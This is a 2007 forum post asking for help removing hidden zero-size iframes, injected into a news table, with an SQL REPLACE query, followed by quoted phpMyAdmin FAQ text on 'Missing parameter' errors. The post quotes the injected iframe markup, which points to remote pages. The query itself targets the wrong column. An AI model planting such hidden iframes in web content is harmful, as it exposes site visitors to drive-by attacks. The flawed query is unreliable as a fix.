New form:
UPDATE hm2_news SET field = REPLACE(small_text,"<iframe src=\"http://1.1.1.1/ttf/sss.php\" height=\"0\" width=\"0\"></iframe><iframe src=\"http://www.xxx.com/search/settings/count/index.php\" height=\"0\" width=\"0\"></iframe>","");
hm2_news is a table name, small_text is a field name. In the table, there are many entries and in main part in small_text field there is that phrase i need to remove.
It returned blank page with this:
: Missing parameter: import_type (FAQ 2.8)
: Missing parameter: format (FAQ 2.8)
This is the info i got from the sql manual regarding this message:
2.8 I get "Missing parameters" errors, what can I do?
Here are a few points to check:
In config.inc.php, try to leave the $cfg['PmaAbsoluteUri'] directive empty. See also FAQ 4.7.
Maybe you have a broken PHP installation or you need to upgrade your Zend Optimizer. See http://bugs.php.net/bug.php?id=31134.
If you are using Hardened PHP with the ini directive varfilter.max_request_variables set to the default (200) or another low value, you could get this error if your table has a high number of columns. Adjust this setting accordingly. (Thanks to Klaus Dorninger for the hint).
In the php.ini directive arg_separator.input, a value of ";" will cause this error. Replace it with "&;".
Last edited by postcd : 04-15-2007 at 03:09 PM.
|